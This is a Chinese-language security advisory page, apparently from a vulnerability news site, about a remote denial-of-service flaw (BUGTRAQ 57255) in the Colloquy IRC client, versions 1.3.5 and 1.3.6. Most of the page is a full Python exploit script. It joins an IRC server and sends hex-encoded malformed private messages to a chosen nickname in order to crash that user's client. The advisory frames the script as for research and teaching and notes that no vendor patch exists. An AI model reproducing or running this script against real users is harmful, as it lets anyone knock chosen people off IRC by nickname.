发布日期:2013-01-09
更新日期:2013-01-13受影响系统:
Colloquy Colloquy 1.3.6
Colloquy Colloquy 1.3.5
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 57255
Colloquy是高级的IRC、SILC & ICB客户端。
Colloquy 1.3.5、1.3.6在实现上存在远程拒绝服务漏洞,攻击者利用此漏洞可造成目标应用崩溃而拒绝服务。
<*来源:Aph3x
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
###################################################################################
# # #
# # H O W - T O #
# # #
# #######################
#
# Provide the Target: Server, Port, Nickname and the script will deliver
# the payload...
#
# [!USE/]$ ./<file>.py -t <server> -p <port> -n <nickname>
#
###################################################################################
from argparse import ArgumentParser
from time import sleep
import socket
shellcode = {
# One Shot <3
"one_shot" : [
"687474703a2f2f782f2e2425235e26402426402426232424242425232426",
"23242623262340262a232a235e28242923404040245e2340242625232323",
"5e232526282a234026405e242623252623262e2f2e2f2e2e2f2e2e2f2324",
"2e24" ],
# 1.3.5
"1_3_5" : [
"687474703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428",
"292c7573657228292c2873656c6563742532302d2d687474703a2f2f6874",
"74703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428292c"
"7573657228292c2873656c6563742532302d2d687474703a2f2f" ],
# 1.3.6 - ( Requires Sending 25 Times )
"1_3_6" : [
"687474703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428",
"292c7573657228292c2873656c6563742532302d2d687474703a2f2f6874",
"74703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428292c",
"7573657228292c2873656c6563742532302d2d687474703a2f2f" ],
}
def own( sock, target, sc_key="one_shot" ):
sc = "".join( shellcode[sc_key] )
targ = "".join( "".join( [ hex( ord( ch ) ) for ch in target ] ).split( "0x" ) )
msg = "505249564d534720{}203a{}0d0a".format( targ, sc )
if sc_key not in "1_3_6":
sock.send( bytes.fromhex( msg ) )
else:
try:
for x in range( 1, 26 ):
sock.send( bytes.fromhex( msg ) )
sleep( .64 )
except:
print( "FAILED!")
def connect( uri, port, target, sc_key ):
sock = socket.socket()
try:
ret = sock.connect_ex(( uri, int( port ) ))
sock.recv(8096)
except:
print( " [-] Failed To Connect To {}".format( uri ) )
exit()
sock.send( b"x4ex49x43x4bx20x7ax65x6dx70x30x64x61x79x0dx0a" )
sock.send( b"x55x53x45x52x20x7ax65x6dx70x30x64x61x79x20x48x45x48x45x20x48x45x48x45x20x3ax3cx33x0dx0a" )
while True:
host_data = str( sock.recv( 8096 ).strip() )
if " 396 " in host_data:
print( " [+] Connection Successful Sending Payload To {}".format( target ) )
own( sock, target, sc_key )
sock.send( b"QUIT
" )
sock.close()
break
try:
msg = host_data.split()
if msg[0].lower() is "ping":
sock.send( b"PONG {}
".format( msg[1] ) )
continue
except:
pass
print( " [!] Payload Sent, Target Should Drop Shortly <3" )
if __name__ == "__main__":
parser = ArgumentParser( description="#legion Colloquy IRC DoS; Requires At Least A Nick To Target" )
parser.add_argument( "-t", "--target", dest="target", default="localhost", help="IRCD Server Uri To Connect On" )
parser.add_argument( "-p", "--port", dest="port", default=6667, help="Port To Connect On" )
parser.add_argument( "-n", "--nick", dest="nick", metavar="NICK", help="Nick To Target" )
parser.add_argument( "-s", "--shellcode", dest="shellcode", default="one_shot",
help="Shell Code To Use, ( one_shot, 1_3_5, 1_3_6 )" )
args = parser.parse_args()
if args.nick is None:
parser.print_help()
exit()
connect( args.target, args.port, args.nick, args.shellcode.strip() )建议:
--------------------------------------------------------------------------------
厂商补丁:
Colloquy
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://colloquy.info/Samsung Kies PrepareSync()远程缓冲区溢出漏洞Nero MediaHome "NMMediaServer.dll"多个拒绝服务漏洞相关资讯 Colloquy安全漏洞 本文评论 查看全部评论 (0)
评论声明尊重网上道德,遵守中华人民共和国的各项有关法律法规 承担一切因您的行为而直接或间接导致的民事或刑事法律责任 本站管理人员有权保留或删除其管辖留言中的任意内容 本站有权在网站内转载或引用您的评论 参与本评论即表明您已经阅读并接受上述条款
收藏该网址